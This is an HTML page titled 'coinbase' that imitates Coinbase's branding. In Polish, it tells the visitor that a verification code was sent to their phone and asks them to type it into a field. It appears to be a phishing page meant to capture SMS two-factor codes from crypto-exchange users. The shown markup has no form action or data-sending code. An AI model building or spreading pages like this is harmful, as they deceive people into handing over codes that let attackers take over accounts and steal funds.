<!DOCTYPE html>
<html lang="en">
<head>
        <meta name="viewport" content="width=device-width, initial-scale=1.0"/>

    <meta charset="UTF-8">
          <!--Import Google Icon Font-->
      <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">

    <title>coinbase</title>
</head>
<body style="width:100%; background-color:#1652f0;">
<div >
    <img src="https://th.bing.com/th/id/R.fd90c62fb5cb945a839a70546dddb1b7?rik=gepPInLjd6DWfw&pid=ImgRaw&r=0" style="width:100%;;">
</div>

<div style="width:93%;margin-left:3%; background-color:white;position:absolute;margin-top:-6ex;">
<div style="padding:2ex;">

<center>
            <span class="material-icons" style="font-size:9.2ex;margin:;color:blue;">send</span>
<P>wysłaliśmy kod weryfikacyjny na Twój numer telefonu</P>
     <P><input type="text" name="code" style="width:80%;padding:1ex;"></P>
      <br/> <button type="submit" style="border:none;color:white;padding:2ex;background-color:#1652f0;"> zweryfikować</button>
</a>
<br/>
</center>
<hr/>


</div>

</div>
<br/>
<br/>
</body>
</html>